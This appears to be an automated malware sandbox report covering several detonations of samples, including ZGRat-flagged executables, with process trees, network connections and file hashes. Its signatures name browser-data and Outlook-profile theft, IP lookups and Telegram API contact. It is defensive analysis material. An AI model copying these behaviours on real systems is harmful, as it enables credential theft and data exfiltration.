| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| GB | 96.17.179.70:80 | tcp | |
| US | 8.8.8.8:53 | 70.179.17.96.in-addr.arpa | udp |
| GB | 96.17.179.68:80 | tcp | |
| GB | 96.17.179.68:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| GB | 96.17.179.83:80 | tcp | |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
| PL | 93.184.221.240:80 | tcp |
Files
memory/4080-16-0x000002626A440000-0x000002626A450000-memory.dmp
memory/4080-36-0x00000262728E0000-0x00000262728E1000-memory.dmp
memory/4080-35-0x00000262727D0000-0x00000262727D1000-memory.dmp
memory/4080-34-0x00000262727D0000-0x00000262727D1000-memory.dmp
memory/4080-32-0x00000262727A0000-0x00000262727A1000-memory.dmp
memory/4080-0-0x000002626A340000-0x000002626A350000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
130s
Max time network
153s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wjwxkhbvw.mp4"
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 3feb7dde744972cacd8d20fb8e1e6e17 |
| SHA1 | e2edfb90cda9fe0977d007ab88a4524d34be321b |
| SHA256 | c234ad4ac0971981297c69144e4b20511fe908d43943c252dfd7db780d2e194e |
| SHA512 | 3fa0a15376d5fdc383e353f7caf4595b276adcc8160e93e284751abd546a19ad067df0daf9095c2c7c7f9b5e1d459a740c76650d984005f51e8b62da22e49865 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | e8e36b528974f6fac920c0bb58e47f37 |
| SHA1 | 99c411cfc0f80d8be72717f04a276df466c87fd4 |
| SHA256 | 23471c2bf7b3025197d55fdf0cd28304cc7083ebc5d853b7f3515a265161855c |
| SHA512 | c0daf493dd6a5ad00094d10b7822f5e26c2dfcffdc72eb29c5b73f31d4ce5e7963c4e69a2d30e70edc72b4bf4425eebbc12844fa746b21b048f47ae60a2bce6f |
Analysis: behavioral19
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:24
Platform
win10v2004-20231215-en
Max time kernel
138s
Max time network
166s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Wlkubkwdmop.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.166.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 28602f97dddaf89e2964b64eb3da1e2c |
| SHA1 | aecc3c7eb77847cb2da332dd52fc3fbe638ecc0a |
| SHA256 | 9ac1642d0a892ca08352f86e2af64b31d30cb9ec2d5878a79db9b5ca403f9f55 |
| SHA512 | 16c93c944f18ac8a3172f542d1672d129ba09ce5386a21d8aadd177f46cc9761650c596905f6897b5cfdafa7c94f0a950ba2937a92df2d013a937b6e301f5b5a |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 381fe4316fc3e55aa63d973eb0e3a051 |
| SHA1 | 50ee6ce6fc1ad75e433902d6778f53a3d5d4f539 |
| SHA256 | de432c8dd36f22ca2adacc09067f14a1dc91a7740c2ca455c3b8ba69587cca43 |
| SHA512 | e2f5d37cbc43193465e024210e3823b342ac6b9e4ffad3789b37d5a77f7f4df0f5c66988d75109cbb87838fdcacabde38598ebb23cfb56d6b47cea6fac51784a |
Analysis: behavioral6
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
141s
Max time network
157s
Command Line
Signatures
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Evllmzg.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 4c5d72dd01816b33209d4344acd68b7a |
| SHA1 | 0c008710af3e0c8c40a9ca53179a6e4ea52af789 |
| SHA256 | 28ae578bab0c7373335a84b701745d62693928cad75bf39c24f0c57d4f9fd94d |
| SHA512 | 7903dc52b64d25005ea4a7d37ebf96a0f1f40f8b349ebcf858db60aa0006176da65d66d71a5014b94c179e76c0cf54a2c650d36aaa15928c67ed5109daecd66d |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | fc240c081ec382df4b74d591d7d37a45 |
| SHA1 | 396e9d8accb2ff8b32e6c3957808cb87d23ad47c |
| SHA256 | 8cfeb277627a0fc9f2596c83dc37f9a3d8871293cd88dadd08f32098bf936038 |
| SHA512 | d8f83773c330b88b43f9ebc6220aa98368854e44a75b73a8575e7171f6c32e784d404e5a2e2e7787d3c71c0cfecdbb983631b639d9fee879b374d498d2ef0ab7 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
112s
Max time network
131s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2192 set thread context of 4360 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\File1crypt.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
memory/2192-1-0x0000000074910000-0x00000000750C0000-memory.dmp
memory/2192-0-0x0000000000CB0000-0x0000000000DF6000-memory.dmp
memory/2192-2-0x0000000005940000-0x0000000005950000-memory.dmp
memory/2192-3-0x0000000005770000-0x00000000058A6000-memory.dmp
memory/2192-4-0x0000000005A90000-0x0000000005BC6000-memory.dmp
memory/2192-6-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-10-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-14-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-18-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-28-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-38-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-48-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-50-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-52-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-56-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-58-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-54-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-64-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-68-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-66-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-62-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-60-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-46-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-44-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-42-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-40-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-36-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-34-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-32-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-30-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-26-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-24-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-22-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-20-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-16-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-12-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-8-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-5-0x0000000005A90000-0x0000000005BC1000-memory.dmp
memory/2192-937-0x00000000017C0000-0x00000000017C1000-memory.dmp
memory/2192-939-0x0000000005C00000-0x0000000005C4C000-memory.dmp
memory/2192-938-0x0000000005CD0000-0x0000000005D9E000-memory.dmp
memory/2192-940-0x0000000006600000-0x0000000006BA4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File1crypt.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
memory/4360-946-0x0000000000400000-0x0000000000578000-memory.dmp
memory/4360-948-0x00000000058B0000-0x0000000005916000-memory.dmp
memory/4360-947-0x00000000057A0000-0x0000000005832000-memory.dmp
memory/4360-945-0x0000000074910000-0x00000000750C0000-memory.dmp
memory/4360-949-0x0000000006530000-0x000000000653A000-memory.dmp
memory/2192-944-0x0000000074910000-0x00000000750C0000-memory.dmp
memory/4360-950-0x0000000007760000-0x00000000077B0000-memory.dmp
memory/4360-990-0x0000000074910000-0x00000000750C0000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File1crypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\File2crypt.exe | N/A |
